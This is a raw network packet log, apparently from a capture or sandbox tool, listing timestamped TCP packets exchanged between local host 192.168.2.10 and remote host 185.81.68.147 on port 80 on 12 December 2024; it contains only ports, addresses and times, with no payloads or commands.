                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.722593069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.723565102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.723673105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.723885059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.724555969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.724653006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.724721909 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.725613117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.725754023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.725791931 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.726620913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.726701021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.726747990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.727607965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.727669954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.727693081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.728610039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.728674889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.728763103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.729600906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.729651928 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.729727983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.730606079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.730664968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.730710983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.731617928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.731677055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.731822968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.732688904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.732800007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.732805014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.733732939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.733791113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.733840942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.734684944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.734797955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.734833002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.735709906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.735910892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.735959053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.738476992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.738483906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.738491058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.738497972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.738545895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.738781929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.738842964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.738889933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.739945889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.740051985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.740111113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.740798950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.740845919 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.740849972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.741751909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.742007971 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.881083965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.881143093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.881208897 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.881736040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.881859064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.881917953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.882886887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.883076906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.883210897 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.883580923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.883737087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.883793116 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.884673119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.884857893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.885742903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.885813951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.885832071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.885873079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.886814117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.886992931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.887034893 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.887898922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.888089895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.888164043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.888899088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.889005899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.889074087 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.890252113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.890403032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.890461922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.890779972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.890882969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.890942097 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.891735077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.891900063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.891953945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.892735958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.892894030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.893073082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.893822908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.894026041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.894113064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.894830942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.895006895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.895067930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.895869017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.896014929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.896070957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.896783113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.896965027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.897026062 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.897794962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.897849083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.898310900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.898839951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.899158001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.899219036 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.899892092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.899990082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.900419950 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.900876999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.901161909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.901232958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.901886940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.902024031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.902791023 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.902863979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.902966976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.903979063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.904052973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.904087067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.904921055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.904992104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.905002117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.905034065 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.905973911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.906106949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.906146049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.906920910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.907053947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.907092094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.907954931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.908004999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.908960104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.909018040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.909051895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.909882069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.910010099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.910084963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.910115957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.911004066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.911124945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.911186934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.912131071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.912257910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.913026094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.913085938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.913177013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.914061069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.914099932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.914110899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.914144993 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.915060997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.915129900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.915188074 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.916093111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.916292906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.916351080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.917098999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.917192936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.918164968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.918209076 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.918253899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.919081926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.919208050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.919214010 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.919265985 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.920157909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.920368910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.920435905 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.921113968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.921216011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.921253920 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.922142982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.922249079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.922305107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.923158884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.923275948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.923480988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.924201965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.924302101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.925185919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.925246000 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.925292015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.925828934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.926246881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.926323891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.926414967 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.927241087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.927340984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.927388906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.928278923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.928381920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.928446054 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.929235935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.929303885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.930176020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.930301905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.930385113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.930538893 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.931283951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.931410074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.932298899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.932339907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.932343006 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.932377100 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.933309078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.933362961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.933403969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.934283972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.009721041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.073879957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.073896885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.073977947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.074135065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.074240923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.074297905 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.075160027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.075248957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.075328112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.076190948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.076251030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.077187061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.077248096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.077306986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.077349901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.078304052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.078373909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.078434944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.079216957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.079339027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.079602957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.080248117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.080354929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.080408096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.081254959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.081399918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.081465960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.082268953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.082405090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.082461119 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.083283901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.083405972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.083457947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.084342957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.084462881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.084515095 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.085319996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.085392952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.085455894 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.086432934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.086865902 CET8049946185.81.68.147192.168.2.10
